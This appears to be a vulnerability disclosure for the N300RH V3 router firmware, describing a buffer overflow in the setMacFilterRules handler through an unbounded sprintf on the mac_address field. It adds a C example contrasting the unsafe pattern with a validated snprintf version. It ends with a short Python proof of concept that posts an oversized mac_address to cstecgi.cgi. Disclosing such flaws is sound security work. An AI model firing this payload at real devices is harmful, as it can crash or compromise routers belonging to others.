Overview

Affected version

N300RH V3_Firmware V3.2.4-B20220812

Vulnerability details

The N300RH V3_Firmware V3.2.4-B20220812 firmware has a buffer overflow vulnerability in the setMacFilterRules function. The v11 variable receives the mac_address parameter from a POST request. Because the user controls the value of mac_address, the sprintf call that uses it can overflow the destination buffer.
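The flaw class described above, next to a bounded and validated form, as an added example that is not the vendor's code or taken from the firmware. The function names, the "mac=%s" format string and the 64-byte buffer size are assumptions made for illustration; the page does not show the decompiled code.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define RULE_BUF_LEN 64   /* assumed size; the real buffer size is not on the page */
#define MAC_STR_LEN  17   /* length of "aa:bb:cc:dd:ee:ff" */

/* Pattern described in the advisory: a request-controlled string is formatted
 * into a fixed buffer with no bound. Shown for contrast only, never called. */
void build_rule_unsafe(char *out, const char *mac_address)
{
    sprintf(out, "mac=%s", mac_address);   /* writes strlen(mac_address) + 5 bytes */
}

/* Returns 1 only if s is exactly six colon-separated hex octets.
 * A NUL byte fails both checks, so the loop never reads past a short string. */
int is_valid_mac(const char *s)
{
    if (s == NULL)
        return 0;
    for (int i = 0; i < MAC_STR_LEN; i++) {
        if (i % 3 == 2) {
            if (s[i] != ':')
                return 0;
        } else if (!isxdigit((unsigned char)s[i])) {
            return 0;
        }
    }
    return s[MAC_STR_LEN] == '\0';
}

/* Hardened form: validate the field, bound the write, treat truncation as an
 * error. Returns 0 on success, -1 if the input is rejected. */
int build_rule_safe(char *out, size_t outlen, const char *mac_address)
{
    if (out == NULL || outlen == 0 || !is_valid_mac(mac_address))
        return -1;
    int n = snprintf(out, outlen, "mac=%s", mac_address);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';                     /* never leave a truncated rule behind */
        return -1;
    }
    return 0;
}
```

Validating the format before formatting rejects the oversized value outright, and the snprintf return check covers the case where the destination is smaller than expected.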


POC

import requests
url = "http://127.0.0.1/cgi-bin/cstecgi.cgi"
cookie = {"Cookie":"SESSION_ID=2:1721039211:2"}
data = {"addEffect":"0","mac_address":"a"*0x1000,"topicurl":"setMacFilterRules"}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)
